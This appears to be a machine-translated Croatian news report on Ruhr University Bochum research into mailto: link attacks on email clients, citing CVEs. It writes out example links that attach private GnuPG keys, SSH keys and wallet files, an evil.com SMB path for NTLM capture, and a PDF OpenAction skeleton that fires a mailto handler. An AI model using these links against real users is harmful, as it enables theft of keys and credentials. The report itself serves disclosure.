Istraživači sa Sveučilišta Ruhr Bochum (Njemačka) () ponašanje mail klijenata prilikom obrade “mailto:” veza s naprednim parametrima. Pet od dvadeset ispitanih klijenata e-pošte bilo je ranjivo na napad koji je manipulirao zamjenom resursa pomoću parametra "attach". Dodatnih šest klijenata e-pošte bilo je ranjivo na napad zamjenom PGP i S/MIME ključa, a tri klijenta bila su ranjiva na napad za izvlačenje sadržaja šifriranih poruka.
Linkovi «"koriste se za automatiziranje otvaranja klijenta e-pošte kako bi se napisalo pismo primatelju navedenom na poveznici. Osim adrese, možete navesti dodatne parametre kao dio poveznice, kao što su predmet pisma i predložak za tipični sadržaj. Predloženi napad manipulira parametrom "attach", koji vam omogućuje da priložite privitak generiranoj poruci.
Klijenti pošte Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) i Pegasus Mail bili su ranjivi na trivijalni napad koji vam omogućuje automatsko prilaganje bilo koju lokalnu datoteku, navedenu putem veze kao što je “mailto:?attach=path_to_file”. Datoteka je priložena bez prikazivanja upozorenja, tako da bez posebne pažnje korisnik možda neće primijetiti da će pismo biti poslano s privitkom.
Na primjer, korištenje veze poput "mailto:[e-pošta zaštićena]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" u pismo možete umetnuti privatne ključeve iz GnuPG-a. Također možete poslati sadržaj kripto novčanika (~/.bitcoin/wallet.dat), SSH ključeve (~/.ssh/id_rsa) i sve datoteke dostupne korisniku. Štoviše, Thunderbird vam omogućuje prilaganje grupa datoteka prema maski koristeći konstrukcije poput "attach=/tmp/*.txt".
Osim lokalnih datoteka, neki klijenti e-pošte obrađuju veze na mrežnu pohranu i staze na IMAP poslužitelju. Konkretno, IBM Notes vam omogućuje prijenos datoteke iz mrežnog direktorija prilikom obrade veza poput “attach=\\evil.com\dummyfile”, kao i presretanje NTLM parametara provjere autentičnosti slanjem veze na SMB poslužitelj kojim upravlja napadač (zahtjev će biti poslan s trenutnim korisnikom parametara provjere autentičnosti).
Thunderbird uspješno obrađuje zahtjeve poput “attach=imap:///fetch>UID>/INBOX>1/”, koji vam omogućuju prilaganje sadržaja iz mapa na IMAP poslužitelju. U isto vrijeme, poruke dohvaćene s IMAP-a, šifrirane putem OpenPGP-a i S/MIME-a, klijent e-pošte automatski dekriptira prije slanja. Programeri Thunderbirda bili su o problemu u veljači i u br problem je već riješen (Thunderbirdove grane 52, 60 i 68 ostaju ranjive).
Stare verzije Thunderbirda također su bile ranjive na dvije druge varijante napada na PGP i S/MIME koje su predložili istraživači. Konkretno, Thunderbird, kao i OutLook, PostBox, eM Client, MailMate i R2Mail2, bio je podvrgnut napadu zamjene ključa, uzrokovanom činjenicom da klijent e-pošte automatski uvozi i instalira nove certifikate prenesene u S/MIME porukama, što omogućuje napadač organizirati zamjenu javnih ključeva koje je već pohranio korisnik.
Drugi napad, na koji su podložni Thunderbird, PostBox i MailMate, manipulira značajkama mehanizma za automatsko spremanje nacrta poruka i omogućuje, korištenjem mailto parametara, pokretanje dešifriranja šifriranih poruka ili dodavanje digitalnog potpisa proizvoljnim porukama, s naknadni prijenos rezultata napadačevom IMAP poslužitelju. U ovom napadu, šifrirani tekst se prenosi kroz parametar "body", a oznaka "meta refresh" se koristi za pokretanje poziva prema napadačevom IMAP poslužitelju. Na primjer: ' '
Za automatsku obradu veza "mailto:" bez interakcije korisnika mogu se koristiti posebno dizajnirani PDF dokumenti - radnja OpenAction u PDF-u omogućuje vam automatsko pokretanje mailto rukovatelja prilikom otvaranja dokumenta:
%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj
Izvor: opennet.ru